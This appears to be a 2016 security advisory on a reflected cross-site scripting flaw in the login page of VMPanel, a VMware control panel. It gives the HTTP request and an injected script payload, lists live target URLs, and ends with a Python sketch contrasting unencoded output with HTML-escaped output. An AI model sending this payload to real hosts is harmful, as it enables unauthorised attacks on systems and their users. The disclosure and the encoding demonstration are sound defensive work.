VMPanel cybervm XSS

2016-12-05 / 2016-12-09
Rahimian (IR)
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

1. Introduction

Affected Product: VMPanel
Vendor Website: http://cybervm.com
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 12/03/2016
Disclosed to public: 12/05/2016
Author: Esmaeil Rahimian
CVE: n/a
Credits: Esmaeil Rahimian of SecureHost: Rahimian@Securehost.co

2. Overview

VMPanel is a powerful web-based VMware ESX/ESXi control panel + WHMCS addon. With VMPanel you can create or remove virtual machines remotely without needing access to the vSphere Client. You can also power off, power on and reset virtual machines through the panel and the module for WHMCS.

3. Details

XSS: Reflected XSS in login page

Cache-Control: no-cache
Connection: Keep-Alive
Referer: http://vmpanel.ir:2023/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
Host: http://vmpanel.ir:2023
Accept-Encoding: gzip, deflate
Content-Length: 90
Content-Type: application/x-www-form-urlencoded

POST Method:

username='"><script>alert('XSS');</script> <a id="&password=&login=Login

Online Demo: https://youtu.be/-n6OOSXxDCc
Online Target: http://vmpanel.ir:2023
http://cybervm.com:2023
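The following is an added example, not part of the original advisory and not VMPanel's code: a Python sketch of the reflected username value from section 3, rendered once unencoded and once with output encoding, then audited with an HTML parser. The login template, the attribute context and all function names are assumptions, since the advisory does not show the panel's markup.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import unquote_plus

# POST body as given in the advisory, embedded as a literal.
BODY = "username='\"><script>alert('XSS');</script> <a id=\"&password=&login=Login"

# Assumed login markup (hypothetical): the advisory does not show the real page.
TEMPLATE = ('<form method="post"><input type="text" name="username" value="{u}">'
            '<input type="password" name="password"></form>')

def submitted_username(body=BODY):
    """Extract the username field from a form-encoded body."""
    fields = dict(pair.split("=", 1) for pair in body.split("&"))
    return unquote_plus(fields["username"])

def render_unsafe(username):
    """Reflects the value unencoded, the behaviour the advisory reports."""
    return TEMPLATE.format(u=username)

def render_safe(username):
    """Encodes & < > " ' so the value cannot close the attribute or tag."""
    return TEMPLATE.format(u=escape(username, quote=True))

class _Audit(HTMLParser):
    """Records every start tag and the parsed value of the username input."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.tags, self.username_value = [], None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        attrs = dict(attrs)
        if tag == "input" and attrs.get("name") == "username":
            self.username_value = attrs.get("value")

def audit(markup):
    """Return (start tags seen, username value) for rendered markup."""
    parser = _Audit()
    parser.feed(markup)
    parser.close()
    return parser.tags, parser.username_value

if __name__ == "__main__":
    name = submitted_username()
    for render in (render_unsafe, render_safe):
        tags, value = audit(render(name))
        print(render.__name__, tags, "round-trips:", value == name)
```

With the unencoded render the parser sees extra script and a elements and a truncated username value; with the encoded render it sees only the form and its two inputs, and the username value round-trips unchanged.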

References:

http://cybervm.com

